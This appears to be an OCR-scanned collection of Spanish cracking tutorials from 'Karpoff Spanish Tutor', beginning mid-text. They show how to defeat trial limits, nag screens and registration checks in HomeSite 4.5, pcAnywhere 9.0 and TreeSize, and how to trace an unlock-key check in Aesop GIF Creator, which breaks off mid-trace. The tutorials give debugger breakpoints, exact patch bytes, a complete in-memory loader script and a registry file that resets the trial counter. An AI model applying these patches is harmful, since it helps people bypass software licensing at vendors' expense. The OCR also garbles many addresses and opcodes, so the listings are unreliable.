estamos trazando), poner un bmsg (el mejor complemento a un buen hwnd) y trazar hacia atrás hasta la función madre 
que hace que se cree la nag para nopearla o buscar el salto condicional que hace que caigamos en ella. la sintaxis del 
comando bmsg es: 


bmsg wm_<opción> (para la lista de opciones escribe wmsg en el sice, las más comunes son bmsg wm_destroy y 
wm_enable..) 


y normalmente en unos cuantos f10 estaremos en el lugar adecuado para poner unos cuantos 90 y olvidarnos de la 
pantalla. 


manos a la obra: 


con el archivo ejecutable (comprimido o descomprimido) ya preparado parar el loader, lo cargamos y vamos siguiendo 
con f10 cómo se comporta el programa. si estamos usando el archivo comprimido, habrá que esperar a que esté 


totalmente desplegado en memoria para poder ver el código original ; si usamos el descomprimido, que es lo más 
adecuado ya vemos el código desde el principio, y tras unos cuantos f10 caeremos en la rutina que crea las nags 
amarillas, que está en 007057ec. lo que hay que hacer a continuación no es necesario explicarlo ya que el código es lo 
suficientemente ilustrativo. 


:007057de cmp byte ptr [0072d658], 00 

:007057e5 je 7057fd 

:007057€e7 mov .... 

:007057ec call 452624 <- llamada que genera las nags amarillas 


hacemos un bpx en la posición de memoria que hallamos elegido para parchear, lanzamos de nuevo el programa y 
cambiamos los bytes oportunos. perfecto, ya no salen las nags: ahora a por la pantalla de la fecha de caducidad. 


corremos el programa hasta que aparezca la pantalla de caducidad, y en ese momento hacemos ctrl-d y escribimos en 
softice hwnd tras lo que nos sale una lista de las ventanas y objetos que tenemos en pantalla, bajamos hasta las que 
corresponden con homesite y vemos una una que se llama tevalnotice seguida de dos buttons.... más claro agua... nos 
fijamos en su handle (izquierda de la pantalla) y le damos la orden : 


bmsg <handle> wm_<opción> 
en este caso podemos utilizar dos opciones: wm_destroy o wm_enable 


si optamos por la primera, el debugger saltará en el momento que desaparece la ventanita de nuestro monitor al pulsar 
el botón de continuar. si usamos la segunda deberemos tomar el handle del botón de continuar, que está deshabilitado, 
y el debugger saltará cuando el botón reciba la orden de activarse. en cualquiera de los dos casos caeremos en el 
mismo código, que habrá que trazar hasta encontrar alguna llamada precedida de un salto condicional, hacemos un 
breakpoint con un doble click sobre la línea y seguimos. por lo general las primeras líneas de código que aparecen se 
corresponden con la formación de la ventana, caption, tamaño, colores... y no son de gran utilidad, pero las que 
aparecen al final ( última y precedentes antes de que £10 deje de hacer saltar el si ) son a las que más hay que prestar 
atención pues suele ser ahí donde se toma la decisión de formarla. hay que ser especialmente cuidadoso al parchear 
aquí porque podemos hacerlo en alguna rutina común a otros procedimientos. una vez puestos los breakpoints se 
vuelve a lanzar el programa y eliminando los que saltan continuamente llegamos al que nos interesa, que está en 
006a2c6f. ya sabéis lo que hay que hacer ¿no?. 


:00622c6b cmp byte ptr [ebp-09], 00 <- ¿han pasado los 30 días? 

:006a2c6f jne 006a2c76 <- si [ebp-09] no es 0 sigue el período de evaluación y salta la llamada a la messageboxa 
:006a2c71 call 64bad8 <- llamada a la formación de la pantalla de caducidad. 

de nuevo poneemos un breakpoint, corremos el programa. parcheamos en memoria y comprobamos que funciona. 

en estos momentos nos hemos cargado las nags del principio y la ventana de caducidad, con lo que el programa ya 


estaría preparado para una evaluación más prolongada y libre de incordios. lo único que nos quedaría sería buscar las 
cadenas de bytes con el uedit32 y cambiarlas por lo que corresponda. 


atención: este método sólo sirve para el archivo descomprimido 


si lo que deseamos es crear un crack para su distribución, no podemos envíar el ejecutable, ya que es muy grande (1.5 
mb comprimido o 4.3 mb descomprimido) , y como estamos tratando con un archivo "encogido" no nos sirve el típico 
parche porque que el código no está expuesto. lo que nos hace falta es algo que haga el parcheo "on the fly" tras la 
descompresión. esto es lo que se conoce como loader o cargador, que no es más que un programa que está atento a la 
descompresión y cambia los bytes cuando están expuestos ( como un bandolero que espera detrás de una roca a que 
aparezca su víctima... ). veremos una forma sencilla de crear uno más adelante. 


bueno, ya tenemos el homesite sin nags, pero todavía quedan restos de su pasado como versión de evaluación: en el 
título de la ventana pone *evaluation version* y la pantalla del about aún nos recuerda que los 30 días han pasado. lo 
que trataremos de hacer es cambiar el título por otra cosa ( *registered version* o tu apodo...) que ocupe los mismos 
bytes y deshabilitar la pantalla de about. 


de pesca: 


recordemos que con el w32dasm no conseguíamos ver los strings del programa, de modo que no podemos buscar así la 
línea. una pasada del search and replace buscándola tampoco sirve de mucho . la solución es buscarla en memoria con 
el softice y parchearla como hacíamos antes. para buscarla utilizamos el comando s de la siguiente manera: 


s 0 Iffffffff'evaluation' 


que le indica que busque la cadena evaluation en toda la memoria. una vez localizado el punto exacto con varios bpm 
en las posiciones obtenidas, sólo hay que escribir (click sobre la cadena) lo que queramos manteniendo la misma 
longitud en bytes. copiar el valor hex de la cadena nueva y parchear con el editor hexadecimal o con el loader. 


el procedimiento para eliminar la ventana del about es el mismo que utilizamos para la de caducidad: 
hwnd 
bmsg <handle> wm_destroy 


y trazar hasta dar con la rutina en 006b58b6. aquí no hay saltos condicionales (porque siempre que pulses about va a 
salir), con lo que la solución es anular la llamada con los nop necesarios. 


ahora sí que tenemos el homesite preparado para su evaluación sin ningún tipo de trabas :-) . 


presentación : rpp (r!sc's process patcher) 


rpp es un creador de parcheadores en tiempo real (loader) que crea un ejecutable win32 a partir de un script. el 
ejecutable carga un proceso, espera a que se descomprima / desproteja y despúes lo parchea en memoria para corregir 
los bugs que el autor ha dejado en él ( nags, evaluaciones de 30días...) y además es el único de este tipo (que crea un 
ejecutable win32 independiente). (traducción libre de la presentación original). 


se puede bajar desde la página de karpoff, en protoolz, en sudden discharge... 


la forma de utilizarlo es ejecutándolo y seleccionando el script que queremos compilar o arrastrando el script sobre el 
ejecutable (mú fácil). también desde la línea de comandos como: 


rpp.exe <script.rpp> 

-sintaxis del script: 

; <- no le hace caso a lo que vaya delante de esto (comentarios y similar) 

t= <- número de intentos de parchearlo que va a hacer hasta darlo por imposible. (8000 por defecto) 
f= <- nombre del proceso a cargar (importante que sea el nombre original del ejecutable) 


0= <- nombre del cargador (el que tú quieras) 


p= <-bytes a parchear ( dirección de memoria | bytes originales / bytes nuevos ). 
los bytes van separados por comas y su número es igual a ambos lados de la barra. 
: <- fin de la instrucción 

$ <-fin del script 

nuestro cargador: 


abrimos el notepad y escribimos el script: 


; cargador para homesite 4.5 por cracx 28 mayo de 2000 <- información para identificarlo con el tiempo :-) 
; creado con r!sc's process patcher 

; incluído a efectos didácticos. su empleo con software que no hayas obtenido legalmente es delito. 

t = 10000: 

; veces que va a intentar parchear. mejor empezar con 10000 e ir bajando hasta que falle 

; depende de las características del ordenador. a mí me funciona siempre así... 

o= homesite_loader.exe: ; nombre del ejecutable de salida 

f= homesite45.exe: ; nombre del proceso a parchear 

p=006a2c6f/75,05,e8,62/eb,05,e8,62: ¡cuarto parche de la nag de 30 días superados 


p=006afdc7/45,56,41,4c,55,41,54,49,4f,4e/52,45,47,49,53,54,45,52,45,44: ;tercer parche de evaluation version a 
registered version 


p=006b58b6/tf,92,cc,00,00,00/90,90,90,90,90,90: ¡segundo parche de la nag de about 


p=007057e5/74,16/eb,16::primer parche de las nag del inicio 


ahora lo guardamos como homesite_script.rpp en el directorio donde tengamos el rpp instalado y lo arrastramos 
encima de rpp.exe. si todo va bien nos sale un mensaje parecido a este: 


http: 22csir. cjb. net 


Thanks for using 1ISC's Process Patcher v1.5 
No problems creating Homesite_2.0.exe 


si sale cualquier otra cosa es que hay un error se sintaxis y tienes que revisar el script. además crea el archivo 
homesite_loader.exe de 5.50kb. copiamos este ejecutable al directorio del programa a parchear y ejecutamos el 


cargador. 


en el momento que ejecutamos, este indica al homesite45.exe que se ejecute, y mientras esto ocurre, hace un ataque a 
las posiciones de memoria indicadas parcheando lo que corresponda. el loader no sabe cuando el objetivo está 
descomprimido, pero como ataca continuamente las posiciones cumple su misión. si no es capaz de parchear al 
programa o en las posiciones de memoria no encuentra lo que le dijimos, saca un mensaje de error y el programa 
transcurre normalmente. 


estos mensajes pueden aparecer por cuatro causas principales: 


1, que haya errores de sintaxis. comprueba el valor de f, que el número de bytes a cambiar es igual que el de originales 
y que los separas por comas y barras 


2. que el valor de t sea muy bajo, en cuyo caso hay que aumentarlo (10000 da buenos resultados, menos depende del 
ordenador que tengas) 


3. que lo estes ejecutando en un directorio que no es el de la aplicación o que esta tenga el nombre cambiado. 


4. el número de bytes a parchear es superior a 180h (limitación del programa) 


resumiendo: 

el trabajo que tenemos que hacer con el homesite 4.5 es: 
1. deshacernos de las nags amarillas. 

2.deshacernos de la pantalla de caducidad. 

3.corregir el título de la ventana principal 

4.anular la ventana about. 


5. crear un cargador que haga todos los cambios anteriores durante el arranque del programa comprimido o parchear 
con el editor hexadecimal si nos sirve el ejecutable descomprimido. 


la mayor dificultad es que no disponemos de un listado muerto útil donde buscar strings, y que todo el proceso de 
rastreo se hace "in vivo". 


la segunda puerta: 


si recordáis, había hecho una búsqueda con el search and replace de la línea “evaluation version* y no la había 
encontrado. pues bien, sinembargo aparecieron unas claves del registro de windows muy curiosas: 


año ARA AE 


Replace with: | y] E 
File Mask: ['.exe +] E 
Path: [C:vArchivos de programa 4llaire*HomeSite 4.5 y] Ed 


Search Results: 

Offset 0x218b42 - TDFS Version a 

Offset 0x218f88 - Version 

Offset Ox24ac82 - SoftwarerMicrosoftWwindows:Currentyersion+rLocalStatusAS2324HE v 

Offset Ox24ad23 - >Software*Microsoftw'indowsCurrentWersion+LocalStatusA52324HE w 

Offset Ox24b042 - SoftwarerMicrosofttwindows+CurrentyersiontLocalStatusAS2324HE v El 

Offset Ox24b08b - >SoftwarerMicrosoftiw'indowsCurrentWersion+LocalStatusAS2324HE v 

Offset Ox24b9e6 - TiNew'Wersionávailable 

Offset Ox24ba13 - TíNewYWersionávailabled44d 

Offset Ox24ba33 - £ New'"Wersionáwvailable 

Offset Ox268b8e - SoftwarerMicrosoftwindows, Current ersion+Explorer,S hell Folders + 
» j 


HDD Ela 2 | 


MIA AS ES A A A altos Ermdararh Cll Eldar 


[Search h 


si utilizamos el regedit para ver que llamadas hace mientras se ejecuta, vemos que antes de que aparezcan las nags se 
hacen varias a localstatusrs232Mhev (¿homesite evaluation quizá?), igual que antes de que se cree la ventana de 
caducidad. curioso ¿no?. vamos a borrarla a ver qué pasa (primero exporta la clave por si acaso). pues ocurre que 
volvemos a tener 30 días de prueba. si volvemos a la clave del registro, aparece de nuevo hev y en ella un nuevo valor 
de cadena llamado dtst que vale 36677. a medida que avanzamos la fecha del ordenador el valor cambia hasta llegar a 
0, momento en el que el programa empieza a sacar la ventana de caducidad. si probamos a cambiar el valor por 
9999999 por ejemplo, nos da 9963352 días de evaluación :-). si no queremos liarnos con el loader hacemos un parche 
para el registro como el que sigue a continuación y listo : 


regedit4 
[hkey_current_userlsoftwarelmicrosoftwindowstcurrentversionVocalstatusrs232Mhev] 
"dtst"="9999999" 

con lo que la molesta pantalla de caducidad no sale nunca. 


si quieres busca la rutina que llama a la clave y parchea la comprobación, pero esto es más fácil. 


adios... 


bueno, espero no haberme liado demasiado al explicar cómo se desprotege este programa y que la lectura haya sido 
amena. sobre archivos empaquetados hay muchos tutoriales y muy buenos en el ecd y otros sitios. en vez del loader se 
podría haber hecho un recorte con el snippet creator e inyectárlo al ejecutable original, ya que el e.p original ya lo 
sabemos gracias al archivo descomprimido y sólo habría que buscar dónde meterlo y dirigir la llamada a él para que 
tomara el control, pero eso es ya otra historia... saludos a todos y hasta la próxima. 


todo lo mostrado en este tutorial es para uso educativo y no para fomentar la piratería. si tienes pensado utilizar este 
programa más de los 30 días de evaluación cómpralo. 


no me hago responsable del mal uso de los contenidos de este documento. 
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CRACKER: 


Karpoff Spanish Tutor 


Symantec pcAnywhere v9.0 


Bomba de tiempo que explota en 30 días 
Simular Estar Registrados 


pcAnyware es una utilidad de acceso remoto a otros ordenadores, que permite 
conexiones directas, vía módem o través de una red. Bastante útil si tienes 
uno o más ordenadores y quieres conectarlos rápidamente en una "minired". 


Principiante + 


http://www.symantec.com 


Wdasm 8.9, Softice 4.5, UltraEdit32 6, TRW2000 (opcional) 


BugSys FECHA: 22/10/00 


introduccion 


en esta ocasión nuestra víctima será pcanyware, de la empresa symantec, famosa por las utilidades norton y 
algunas cosas más. pcanyware es una utilidad de acceso remoto a otros ordenadores, que permite conexiones 
directas, vía módem o través de una red. bastante útil si tienes uno o más ordenadores y quieres conectarlos 
rápidamente en una "minired". 


al atake 


primera aproximación: 


un primer vistazo al programa con los típicos regmon y filemon no dan demasiada información, 
se pueden monitorizar tres ejecuciones, la primera, una antes de caducar, y la de caducidad, 
por si pone alguna marca en algún archivo o en el registro de windows. tras comparar los 
tres registros con excel se ve que la única vez que escribe algo en el registro es cuando 
caduca el programa , además de un fichero en c:windowslapploglY. la clave de registro que se 
cambia es un poco extraña: 

hkcrYclsidl [ 9bb8b204-17b0-11d0-bdf9-0020a£f3743f6)Mbuffseticache. 

en principio parece que es alguna tontería de windows y su Caché, pero más adelante veremos 


que no es así. 


aproximación en vivo 

bueno... pues vamos a ver por donde le podemos entrar a esta preciosidad... ejecutamos el 
programa y nos sale una pantalla que nos recuerda que el programa está caducado y una lista 
de teléfonos para encargar la versión completa. empecemos por aquí con el winice cargado 


hacemos un hwnd, 


que nos da información de todas las ventanas que hay en pantalla y el 


programa al que pertenecen. buscando por winaw32 encontramos un dialog con un botón y nos 


fijamos en el handle... ahora lo que tenemos que hacer es poner un breakpoint en el momento 


que se destruye y ver de dónde viene... sencillo: 

bmsg /handle/ wm_destroy 

tras unos pocos f12 caemos en una dll llamada awcomm32.d11, qu s dónde se genera la 
ventana, y después en el ejecutable, donde se ve la llamada a la rutina checktimebomb d 
awcomm32.d11 (bonito nombre para una función... además de ilustrativo). 


veamos: tenemos una dll con una función llamada checktimebomb que es la que genera la nag y 
hace que salgamos del programa. si nos fijamos en los registros del sice, al salir de la dll 
tenemos eax = 0. vamos a ver si hay un flag por aquí... ponemos un bpx en la entrada a la 
función y al salir pinchamos en el valor de eax y lo hacemos igual a 1. f5 y ¡bingo! el 
programa funciona. 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :004060£9 (c) 


:00406111 57 push edi 


* reference to: awcomm32._timebombcheckQ4, ord:00chbh 

:00406112 £f1524814500 call dword ptr [00458124]<- de aquí hay que salir con eax=1 
:00406118 85c0 test eax, eax 

:0040611a 7509 jne 00406125 

:0040611c 5f pop edi 

:0040611d 5e pop esi 

:0040611e 81c498000000 add esp, 00000098 

:00406124 c3 ret 


1. de la llamada a awcomm32 hay que salir con eax=1. 

ahora sólo habría que anular la llamada y escribir mov eax,01 rellenando con los nops 
necesarios para mantener el numero de bytes. prueba... funciona ¿no?. 

intenta hacer alguna conexión.... ¡te pillé!, el desgraciado no funciona y nos vuelve a 
salir la pantalla de fin de evaluación. lo que hemos hecho es modificar sólo uno de los 
ejecutables que conmponen el programa. lo que primero se le ocurre a uno es trazar todos los 
ejecutables y hacer que a la salida de awcomm32._timebombcheck siempre eax valga 1 o 
cambiando el salto condicional (si lo hubiera). bueno... si no tienes otra cosa mejor que 
hacer serviría, pero sería mejor mirar la dll y modificarla, ya que la función está ahí 
dentro y cada vez que sea llamada ya daría el valor eax=1 a la salida.. 


si echamos un vistazo al desensamblado de awcomm32.dl1, vemos que los nombres de las 
funciones son muy ilustrativas :-). lo que más me ha llamado la atención es una bifurcación 
en el código, ya que parece que la dll puede distinguir si es una versión legítima ( va por 
is custom??purchasedver..... ) o la demo shareware (is custom?? timebombver....). la nuestra 
es la timebombeada :-p... así que tendremos que ver por dónde se mete y dónde se determina 
que eax valga 0ó l a la salida. 

se podría tratar de mirar dónde se elige purchasedver o timebombver, pero lo que me interesa 
ahora es eax y no si he pagado o no por el programa. 

la parte interesante de la dll es la siguiente: 


* reference to: iscustom. ?timebombverftctbombcachelflgaexaag0lz, ord:0011h 
:67ea3a142 ff15e400eb67 call dword ptr [67eb00e4] 
:6l1ea3a18 33c0 xor eax, eax 

:67eal3ala 8b4c2434 mov ecx, dword ptr [esp+34] 
:67ea3ale 8b542418 mov edx, dword ptr [esp+18] 
:67ea3a52 66alee8eeb67 mov ax, word ptr [67eb8eee] 
:67ea3a58 8lel1ffff0000 and ecx, 0O000ffff 

:67ea3a5e 51 push ecx 

:67eaB3a5f 8le2ffff0000 and edx, 0O000ffff 

:6lea3a65 33c9 xor ecx, ecx 

:67ea3a67 52 push edx 

:67ea3a68 668b0dec8eeb67 mov cx, word ptr [67eb8eec] 
:67ea3a6f 50 push eax 

:67ea3a70 51 push ecx 

:671ea3a71 e82afcffff call 67ea36a0 

:67ea3a76 83f8ff cmp eax, ffffffff 

:67ea3a79 0f8492010000 je 67ea3c11 <- cuidadín 
:6leaB3a7f 85c0 test eax, eax 

:67ea3a81 745a Je 67eaB3add <- cuidadín 

:67ea3a83 83f801 cmp eax, 00000001 


:67ea3a86 7427 Je 6leaB3aaf <- cuidadín 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :67ea3a32 (c) 


:67ea3a88 8d4c241c lea ecx, dword ptr [esp+lc] 


* reference to: iscustom.??1ctbombcachellqaebxz, ord:0002h 
:67ea3a8c ff15c800eb67 call dword ptr [67eb00c8] 

:67ea3a92 8b542414 mov edx, dword ptr [esp+14] 

:67ea3a96 8b442410 mov eax, dword ptr [esp+10] 

:67ea3a%a 5f pop edi 

:67ea3a9% 5e pop esi 

:67ea3a9c 894204 mov dword ptr [edx+04], eax 

:67eaB3a9f 5d pop ebp 


* possible reference to string resource id=00001: "no se ha podido cargar un componente 
(Ss). vuelva a instalar" 

:67ea3aa0 b801000000 mov eax, 00000001 <-esto nos hará el trabajito... :-) 

:67ea3aab 5b pop ebx 

:67ea3aab 81c408020000 add esp, 00000208 

:67ea3aac c20400 ret 0004 <-eax=1 a la salida... jJe..]Je.. 


2. en 67ea3aa0 hacen el trabajo por nosotros.... y salimos con eax= 1 

lo que nos interesa es que llegue a la intrucción en 6/ea3aa0 siempre, que es lo que ocurre 
en el periodo de evaluación y hace que a la salida eax= 1l. sin entrar en más explicaciones 
que las notas al código, se ve que hay que anular los saltos en 3a79, 3a81l y 3a86. pues 
eso... con los offset se va al ultraedit y se parchea. el pcanyware queda listo para una 
óptima evaluación. 


y qué pinta en todo esto aquella clave de registro tan rara. pues para empezar el nombre 
ahora ya nos dice algo.... caché (tbombcache), además, si buceamos un poco en las llamadas 
que hay en esta función, hay accesos a esa clave, tanto en lectura como escritura. la clave 
que nos parecía una chorrada del windows resultó ser el detonador de una bomba de tiempo que 
hace Caducar al programa. para desactivarla sólo hay que cortar los cables verde, azul y 
amarillo y listo.... ya no explotará nunca más. 
para trazar las llamadas que menciono arriba, recomiendo el trw2000, que nos da el nombre de 
la función llamada además del offset del call. nada mas entrar en la función desde el 
ejecutable, verás las llamadas a readfile para comprobar si es la versión demo o la 
comprada, además de las llamadas de apertura , escritura y cierre a la clave del registro 
que contiene el detonador, como véis un monton de sitios que se podrían usar para entrar. 

lo bueno de trazar con el trw es que vemos en todo momento lo que ocurre sin necesidad de 
romperse mucho la cabeza y sin necesidad de desensamblar. feliz buceo.... 


recordad que si vais a utilizar este programa deberéis comprarlo. 


las acciones aquí descritas lo son con fines educativos. su puesta en práctica va en contra de la ley de derechos de autor y está penado. 


bugsys - septiembre de 2000 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: TreeSize profesional 2.2 

PROTECCION: “Nag” molesta 

Objetivo: Quitar la 'nag” y las referencias a 'UNREGISTERED'” 

Descripcion: Información del espacio libre en el disco 

Dificultad: PRINCIPIANTE 

DOWNLOAD : http://www. jam-—-software.com/treesize.html 

Herramientas: Softice, Hex Workshop (Editor Hexadecimal) 

CRACKER: Perico FECHA: 22/10/00 
introduccion 


este programa es una utilidad para el disco. 


en un principio parece que no tiene ninguna limitación, pero al cabo de un numero de usos al salir del 
programa nos aparece una “nag” pidiendo que nos registremos. 


TreeSize Professional 


vamos a quitar esta nag” y todas las referencias a unregisterd para dejar el programa “mas mono”. 


al atake 


ejecuta el programa una primera vez para que cree las entradas necesarias en el registro. ahora lanzamos el programa 
techfact98 y ejecutamos el treesize para ver que cambios se producen. 


7 TechFacts 98 11m] E 
File Edit ¿Action Email 'W'indow Help 


XNCOBAOVIAAR ADAN 


Monitor | Spy | System | Action Tools | intemet | Contig | Search | Network | Tweak | Inspect 8: Clean | 


s Type of System W'atch 
Watch System 
E Al land 32-bit Windows Executable 
> Moveltl (+ Run this program: [C:sutlidadsT reeSize Professional 2.24 T sizepro.exe E 
Ez DiskUsage | ¡7 watch Contents of INI files: CAWINDOW'SYWIN.INI g 
Software Versions C-0WINDOWSISYSTEM.INI Pr 
File Associations [4 Watch Registry g 


IV Watch Disks: 
Bar | añ 


E lc | YES —cA hd 
[Y Continue watch even if your system reboots... 


Y So 


13:03:51 | 


“tools” -> “watch system” -> “run this program” -> “go” 
cuando salga el programa treesize sales de él para que haga las comparaciones. 


después de un rato vemos que entre otras cosas hay estas modificaciones: 


Registry key values changed: [6] 

HKEY_USERSA.DEFAULTA Softwares JAM Software. TreeSize Professional 

Walue "ClstrSize"": from "26" to "39" 

HKEY_USERSA.DEFAULTA Software Network Associates TWDMcáfee VirusScan Current ersioniS cl 
Walue "wLastExec"": from '"18677760" to "188743689" 

HKEY_CURRENT_USER Software 4M Software, TreeSize Professional 

Walue "ClstrSize"": from "26" to "39" 


si volvemos a realizar el proceso vemos que el valor de la clave “clstrsize” ha vuelto a cambiar. es el valor de esta clave 
el que hace que aparezca la 'nag”. lo puede comprobar ejecutando el programa y mirando en el registro el valor de la 
clave. va aumentando su valor sumándole 13 (13,26,39,52,65,...,,169,...,273). al llegar a este valor aparece la 'nag”. 


nuestro objetivo es hacer que este valor no aumente. 


para hacerlo entramos en el “symbol loader” del softice y le decimos que ejecute nuestro programa. cuando rompa en 
nuestro programa le pondremos un breakpoint. el siguiente breakpoint (gracias a mr. nobody y a su coc2000) hace que 
el sice rompa cada vez que se quiere acceder a una clave del registro que empiece por'clst” (solo puedes poner 4 letras 
como máximo). 


bpx regqueryvalueexa if *(esp->8)=="clst' 


lo escribimos y le damos a “ctrl-c”. la primera ve rompe en --- advapi ---, le damos a f5 y vuelve a romper, esta vez 
entreesize, le volvemos a dar a f5 tres veces más. y la tercera vez rompe en: 


100474142 SB45FC mov eax, dword ptr [ebp-04] 
200474145 ESIAFDFFFF call 00473E64 

:0047414C 741C je 00474164 

:0047414E SD4DEC lea ecx, dword ptr [ebp-14] 
:00474151 SBD6 mov edx, esi 

200474153 8B45FC mov eax, dword ptr [ebp-04] 
:00474156 ESSDFEFFFF call 00473098 

:0047415B SBD3 mov edx, ebx 


ahora ha roto en la instrucción :0047415, a continuacion hay un salto je 0047416 que el sice nos dice que no se 
produce. consideré este salto como sospechoso la primera vez que lo vi y por eso decidí forzarlo. si lo forzamos en el 
sice con 


rfiz 


vemos que el valor de la clave *clstrsize” vuelve a su valor inicial (es decir 13) 


para hacer permanente, abrimos nuestro editor hexadecimal y buscamos la cadena *84c0741c8d6dec”. una vez 
encontrada cambiamos el 74 por 75 con lo que invertimos el salto haciendo que se produzca. también podemos 
convertir el 741c en eb1c que equivale a jmp, es decir que salte siempre. da igual hacer el cambio que prefiráis. 


una vez hecho, salvamos el programa con el cambio realizado y vemos que al ejecutar el programa el valor de 
“esltrsize” no cambia nuca por lo que no nos volverá a aparecer la “nag”. 


si somos de las personas (me incluyo) a las que les molesta que nos recuerden que estamos unregistered, es muy 
fácil quitarlo. volvemos al editor hexadecimal y lo buscamos como text string y nos aparece como: 


(unregistered) -> 28554e5245474953544552454429 


ahora cambiamos el 28 por 00 (o toda la cadena por nuestro nombre o lo que queramos, teniendo cuidado de no 
sobrepasar el tamaño de (unregistered)). este cambio le indica que la cadena ha terminado por lo que no se mostrara. 


seguimos buscando y cambiando. la cadena nos aparece una vez mas en la que volvemos a realizar el mismo cambio. 


pd: he comprobado que las versiones posteriores de este programa (las versiones 2.30 y 2.31) tienen esta misma 
protección. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Aesop GIF Creator v1.00.215 


Protección: Unlock Key 


Descripción: Utilidad para crear GlFs animados 


Dificultad: Facililla 


Download: http: //www.yukudr.com/software 


Herramientas: Softl CE 


Cracker: MeGaBiTe 12/10/2000 


introducción 
extraído de la ayuda del propio programa. 


["aesop" es una potente herramienta que le permite crear increíbles imágenes gif publicitarias 
(banners, botones, líneas, etiquetas, fondos, encabezados para sitios webs, etc.), que contienen 
carcterísticas propias de sofisticadas calidades de estudio, efectos especiales, fuentes 3d y 
manipulación de imágenes. se pueden realizar maravillosos efectos visuales (por ejemplo, 
desplazamiento de texto a través de la imágen) en ficheros gif multi-frames en unos pocos minutos. 
la optimización de la paleta y la compresión de datos le proporcionan la posibilidad de obtener gifs de 
pequeño tamaño. la simplicidad y comodidad de su interface hacen que éste programa sea útil tanto 
para los programadores experimentados como para quienes empiezan en el diseño gráfico.] 


he estado buscando por la ayuda y no pone nada sobre limitaciones, períodos de evaluación, etc. 
cabe suponer, en consecuencia, que para registrarnos lo único que debemos hacer es introducir el 
'unlock key' correcto. bien, ¡vamos a éllo! 


una vez instalado el programa vamos al menú 'help' y seleccionamos la opción 'registration'. esto hará que se 
nos abra la ventana 'register me!'. podemos verla aquí abajo: 


To obtain unlock key you must fill in the On-line Order Form 
or send us the Order Form by tax: +1 (775)-418-6895 


On-line Order Form: http: 2www. yukudr corn ¿software 


Fax Order Form: Print Fax Order Forrn 


Registration 
YourlDis:  2608-62355-L 


Unlock key: | 
| considerto register later | 


bien podemos ver aquí que se nos proporciona un 'id' y se nos pide que introduzcamos un 'unlock key”. 
pudiéramos suponer que éste 'id' se genera aleatoriamente en el proceso de instalación del software y variará 
tanto en cada instalación como en cada equipo en el que se instale el programa. ¡es lo razonable! bien, ¡pues 
no! lo he instalado y reinstalado varias veces en el mismo equipo y en equipos diferentes y, ¡siempre nos 
proporciona el mismo 'id'! bueno, ésto hace que nuestro trabajo sea más sencillo. 


Eontitm una key 


intentamos registrarnos con un 'unlock key' falso: digamos 'u1193046'. pulsamos el botón 'confirm unlock 
key'. se nos aparece ésta 'ventanita': 


Aesop 


ES Invalid unlock key. 


¡¡¡toma ya!!! ¿un mensaje de error? ¡¡¡imposible!!! ¡¡¡vamos a ver qué ocurre!!! 


vamos a poner un breakpoint y entrar al código del programa. la función api que funcionará aquí (y en casi 
cualquier programa) es 'hmemcpy". 


antes de establecer nuestro breakpoint en softice deberemos abrir nuestra ventana 'register me!' y escribir un 
'unlock key' falso. debemos hacerlo así ya que si establecemos el breakpoint antes, softice hará break en 
cada uno de los carácteres que introduzcamos en el campo 'unlock key', ya que se llama a ésta función cada 
vez que se introduce un carácter. 


bien, por lo tanto una vez que hayamos introducido nuestro 'unlock key" falso pulsamos ctrl-d para 
cambiarnos a softice y en la ventana 'command!' escribimos "bpx hmemcpy”, con lo que ya tenemos 
establecido nuestro breakpoint. pulsamos f5 para regresar a nuestra 'criaturita' y pulsar el botón 'confirm 
unlock key'. lo hacemos así y softice hará break; ahora pulsamos f12 hasta que lleguemos al código del 
programa. para identificar que estamos en el código apropiado deberemos ver en la línea superior a la 
ventana command del softice algo como 'aesop!code+0002670d'. una vez lleguemos aquí deberemos, no 
obstante, seguir pulsando f12 para volver de los diferentes 'ret' y llegar de éste modo a la parte del código 
que realmente nos interesa. es la siguiente: 


0177:0048d4bd call 0042e320 


0177:0048d4c2 mov edx, [ebp-0104] >aterrizamos aquí 
0177:0048d4c8 lea eax, [ebp-0100 
0177:0048d4ce mov ecx,000000ff 
0177:0048d4d3 call 00403f4c 
0177:0048d4d8 lea edx, [ebp-0100 
0177:0048d4de mov eax, [00498654 
0177:0048d4e3 mov eax, [eax] 
0177:0048d4e5 call 00495124 
0177:0048d4ea mov eax, [00498654 
0177:0048d4ef mov eax, [eax] 
0177:0048d4f1 cmp byte ptr [eax+0007fb71],fb 
0177:0048d4f8 jnz 0048d590 

0177:0048d4fe mov dl,01 
0177:0048d500 mov eax, [0048b680] 


bien, traceamos nuestro código pulsando f10 hasta llegar a la instrucción 'call 00495124' en la posición 
'0048d4e5'. una vez tengamos el cursor en ésta instrucción vamos a ver qué tenemos dentro. para éllo 
pulsamos f8 y nos encontraremos con el siguiente código: 


0177:00495122 3jns 00495124 

0177:00495124 push ebp >aterrizamos aquí 
0177:00495125 mov ebp, esp 

0177:00495127 add esp, fffffef4 

0177:0049512d push ebx 

0177:0049512e push esi 

0177:0049512f push edi 

0177:00495130 xor ecx,ecx 

0177:00495132 mov [ebp-0104],ecx 

0177:00495138 mov [ebp-0108],ecx 

0177:0049513e mov [ebp-010c],ecx 

0177:00495144 mov esi,edx 

0177:00495146 lea edi, [ebp-0100] 

0177:0049514c xor ecx,ecx 

0177:0049514e mov cl, [esi]l >pone la longitud de nuestro 
>unlock key falso en cl 


0177:00495150 inc ecx 

0177:00495151 repz movsb >copia el unlock keyfalso a 
>otra posición (lo copia con la 
>longitud en el primer byte de 
>la cadena, tal como se 
>gestionan las cadenas en 
>pascal) 


0177:00495153 mov ebx,eax 

0177:00495155 xor eax,eax 

0177:00495157 push ebp 

0177:00495158 push 004951f7 

0177:0049515d push dword ptr fs: Í[eax] 

0177:00495160 mov fs: [eax],esp 

0177:00495163 mov byte ptr [ebx+0007fb71],00 

0177:0049516a lea eax, [ebp-0104] 

0177:00495170 lea edx, [ebp-0100] >pone el unlock key falso en 

>edx (todavía con la longitud 

>en el primer byte) 

0177:00495176 call 00403£14 >este call copia el unlock 
>key falso ya sin el byte de 
>longitud del principio en una 
>posición de memoria 

